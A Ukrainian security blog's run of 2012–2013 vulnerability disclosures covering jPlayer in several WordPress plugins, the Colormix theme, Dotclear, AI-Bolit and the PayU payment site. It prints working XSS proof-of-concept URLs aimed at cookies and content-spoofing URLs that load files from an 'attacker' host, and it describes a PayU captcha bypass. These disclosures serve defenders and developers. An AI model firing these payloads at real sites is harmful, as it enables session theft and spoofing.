Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• (0Day) HP SiteScope SOAP Call getFileInternal Remote Code Execution Vulnerability (деталі)
• EMC NetWorker Module for Microsoft Applications (NMM) Multiple Vulnerabilities (деталі)
• (0Day) HP SiteScope SOAP Call loadFileContent Remote Code Execution Vulnerability (деталі)
• tinyproxy security update (деталі)
• (0Day) HP SiteScope SOAP Call update Remote Code Execution Vulnerability (деталі)
• FreeRADIUS: Stack Overflow in TLS-based EAP Methods (деталі)
• freeradius security update (деталі)
• Memory corruption vulnerabilities in Konqueror (деталі)
• HP Performance Insight with Sybase, Remote Denial of Service (DoS) and Loss of Data (деталі)
• Mesa vulnerability, as used in Google Chrome (деталі)

У січні, 31.01.2013, я виявив Cross-Site Scripting та Content Spoofing уразливості в плагінах для WordPress, що містять jPlayer. Про що вже сповістив розробників п’яти наведених плагінів.

Раніше я писав про XSS та Content Spoofing уразливості в jPlayer. Це дуже поширена флешка, що знаходиться на десятках тисяч веб сайтів і яка використовується в сотнях веб додатків. При стандартному пошуку через Гугл дорки виводиться 32000 сайтів з Jplayer.swf, а при пошуку по плагінам для WordPress можна знайти 239000 сайтів з цією флешкою.

Цей плеєр міститься в багатьох плагінах для WordPress. Серед них MP3-jPlayer, Haiku minimalist audio player, Background Music, Jammer і WP jPlayer. Та існують інші уразливі плагіни для WordPress з Jplayer.swf (судячи з гугл дорка). Розробники jPlayer випустили оновлення свого плеєра і всім розробникам веб додатків з jPlayer потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

В різних версіях jPlayer різні XSS уразливості.

MP3-jPlayer:

http:/site/wp-content/plugins/mp3-jplayer/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Haiku minimalist audio player:

http:/site/wp-content/plugins/haiku-minimalist-audio-player/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Background Music:

http:/site/wp-content/plugins/background-music/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Jammer:

http:/site/wp-content/plugins/jammer/files/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

WP jPlayer:

http:/site/wp-content/plugins/wp-jplayer/assets/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http:/site/wp-content/plugins/wp-jplayer/assets/js/Jplayer.swf?id='))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Content Spoofing (WASC-12):

Можна проводити CS (включення аудіо/відео файлів з зовнішніх ресурсів) через JS і XSS через JS калбеки. Для цього необхідна HTML Injection уразливість на цільовому сайті. Атака аналогічна XSS через калбеки в JW Player.

Вразливі наступні веб додатки: MP3-jPlayer 1.8.3 і попередні версії, Haiku minimalist audio player 1.0.0 і попередні версії, Background Music 1.0 і попередні версії, Jammer 0.2 і попередні версії, WP jPlayer 0.1 і попередні версії.

Дані XSS уразливості виправлені в версії jPlayer 2.2.23 (але не виправлені CS через JS і XSS атаки через JS калбеки, а також в версії 2.3.0 працюють інші обхідні методи атаки, про що я вже писав розробникам jPlayer у березні та нагадав ще раз). Тому розробникам даних та інших плагінів для WP з jPlayer потрібно оновити його до останньої версії.

14.03.2013

У січні, 31.01.2013, я виявив Cross-Site Scripting та Content Spoofing уразливості в jPlayer. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

20.04.2013

Cross-Site Scripting (WASC-08):

В різних версія jPlayer різні XSS уразливості.

0.2.1 - 1.2.0:

http:/site/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

2.0.0:

http:/site/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

2.1.0:

http:/site/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http:/site/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

В версії 2.2.0 ці XSS уразливості вже виправлені. Але Malte Batram (в версії 2.2.19) і я (в версії 2.2.20) виявили нові.

2.2.0 - 2.2.19 (і попередні версії):

Атака працює в Firefox (всі версії та браузери на движку Gecko), IE6 і Opera 10.62.

http:/site/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

2.2.20 - 2.2.22 (і попередні версії):

http:/site/Jplayer.swf?jQuery=alert&id=XSS

Content Spoofing (WASC-12):

Можна проводити CS (включення аудіо/відео файлів з зовнішніх ресурсів) через JS і XSS через JS калбеки. Для цього необхідна HTML Injection уразливість на цільовому сайті. Атака аналогічна XSS через калбеки в JW Player.

Уразливі версії до jPlayer 2.2.23. Версія 2.2.23 і остання версія 2.3.0 не є вразливими до наведених XSS, окрім CS через JS і XSS атак через JS калбеки. Також в версії 2.3.0 працюють інші обхідні методи атаки, які вони не виправили окрім атаки через alert. Про що я вже писав розробникам у березні та нагадав ще раз.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Mathjax Latex, podPress та FuneralPress. Для котрих з’явилися експлоіти. Mathjax Latex - це плагін для додання підтримки latex і mathml формул, podPress - це плагін для подкастінга, FuneralPress - це похоронний менеджер та гостьова книга.

• WordPress Mathjax Latex 1.1 Cross Site Request Forgery (деталі)
• WordPress podPress 8.8.10.13 Cross Site Scripting (деталі)
• WordPress FuneralPress 1.1.6 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Раніше я вже писав про численні уразливості в численних темах для WordPress виробництва RocketTheme. Окрім тем цих розробників я виявив подібні уразливості в багатьох темах інших розробників (в тому числі в custom темах).

У грудні, 22.12.2012, я знайшов Cross-Site Scripting, Content Spoofing та Full path disclosure уразливості в темі Colormix для WordPress. Що аналогічні уразливостям в темах для WP від RocketTheme.

XSS (WASC-08):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Content Spoofing (WASC-12):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

Full path disclosure (WASC-13):

В папці http://site/wp-content/themes/colormix/ в index.php та багатьох інших php-файлах теми є FPD, що спрацьовують при налаштуваннях PHP по замовчуванню.

Уразливі всі версії теми Colormix для WordPress.

12.12.2012

У листопаді, 05.11.2012, я знайшов Insufficient Anti-automation, Brute Force і Abuse of Functionality уразливості на http://www.payu.ua - сайті системи онлайн платежів PayU. Про що найближчим часом сповіщу адміністрацію сайта.

Як і всі ті сайти платіжних систем власники яких заявляли про відповідність PCI DSS і на яких я знаходив дірки, на сайті www.payu.ua заявлена відповідність PCI DSS. Але їм ще потрібно виправляти чимало уразливостей, щоб цього досягти.

Стосовно дірок на сайтах онлайн магазинів та електронних платіжних систем в останнє я писав про уразливості на www.allmoney.com.ua та plimus.com.

Детальна інформація про уразливості з’явиться пізніше.

18.04.2013

Insufficient Anti-automation:

http://www.payu.ua/zayavka-na-podklyuchenie

Не було захисту від автоматизованих атак. Зараз поставили капчу.

Brute Force:

https://secure.payu.ua/cpanel/

Окрім BF тут ще і CSRF. Капча обходиться видаленням кукіса.

Abuse of Functionality / Insufficient Anti-automation:

https://secure.payu.ua/cpanel/recover_password.php

Витік логінів/емайлів. Капча обходиться видаленням кукіса.

Виправили лише одну IAA уразливість. Всі інші уразливості досі не виправлені.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах IndiaNIC FAQS Manager, Level Four Storefront та WP Banners Lite. Для котрих з’явилися експлоіти. IndiaNIC FAQS Manager - це плагін для управління списками часто задаваємих питань, Level Four Storefront - це плагін для створення кошика покупця, WP Banners Lite - це локальна банерна система.

• WordPress IndiaNIC FAQS Manager 1.0 XSS / CSRF (деталі)
• WordPress Level Four Storefront SQL Injection (деталі)
• WP Banners Lite 1.40 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

22.01.2013

У грудні, 02.12.2012, я виявив Brute Force та Information Leakage уразливості в секюріті додатку AI-Bolit. Про що вже повідомив розробникам веб додатку.

AI-Bolit — це скрипт для пошуку вірусів, троянів, бекдорів та іншої хакерської активності на хостингу.

Детальна інформація про уразливості з’явиться пізніше.

13.04.2013

Brute Force (WASC-11):

http://site/ai-bolit.php?p=1

Information Leakage (WASC-13):

http://site/AI-BOLIT-REPORT.html

http://site/AI-BOLIT-REPORT-<дата>-<час>.html

Витік звітів зі статистикою та FPD. В тому числі такі звіти заіндексовані пошуковими системами. Якщо в звіті показані виявлені на сайті бекдори, то отримавши доступ до звіту, можна дізнатися про бекдори і з їх використанням похакати сайт.

Уразливі всі версії AI-Bolit. У версії 20121014 формат імені файла був змінений (з доданням дати і часу), але його все ще легко підібрати, тому IL уразливість залишилась актуальною. Розробник програми пообіцяв виправити ці уразливості в нових версіях. У версії 20130201 було заборонене індексування звіту та в ім’я файла звіту додається випадкове число (для захисту від підбору імені).

10.01.2013

У листопаді, 13.11.2012, я виявив Cross-Site Scripting та Content Spoofing уразливості в Dotclear. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливість в Dotclear.

Детальна інформація про уразливості з’явиться пізніше.

12.04.2013

Cross-Site Scripting (WASC-08):

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)
http://site/inc/swf/player_flv.swf?configxml=http://site/attacker.xml
http://site/inc/swf/player_flv.swf?config=http://site/attacker.txt

Код виконається після кліку. Це strictly social XSS.

Content Spoofing (WASC-12):

http://site/inc/swf/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

Можна включати текст, зображення та html (наприклад, для link injection).

http://site/inc/swf/player_flv.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_flv.swf?config=http://attacker/1.txt
http://site/inc/swf/player_flv.swf?flv=http://attacker/1.flv
http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_mp3.swf?config=http://attacker/1.txt
http://site/inc/swf/player_mp3.swf?mp3=http://attacker/1.mp3

Уразливі Dotclear 2.4.4 (і частково 2.5) та попередні версії. В версії Dotclear 2.5 розробники виправили уразливості, але неефективно: по-перше, всі три вразливі флешки наявні в движку (тому з репозиторію чи з сайтів не слід їх брати для використання в своїх проектах, бо це вразливі версії флешек), по-друге, заборона прямого доступу до флешек (через .htaccess), щоб не можна було використати уразливості в них, працює лише на Apache, але не на інших веб серверах (тому сайти на них є вразливими).

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Occasions, Count Per Day та IndiaNIC FAQS Manager. Для котрих з’явилися експлоіти. Occasions - це плагін для зміни логотипів по датам, Count Per Day - це плагін для ведення статистики відвідувань, IndiaNIC FAQS Manager - це плагін для управління списками часто задаваємих питань.

• WordPress Occasions 1.0.4 Cross Site Request Forgery (деталі)
• WordPress Count Per Day 3.2.5 XSS (деталі)
• WordPress IndiaNIC FAQS Manager 1.0 SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.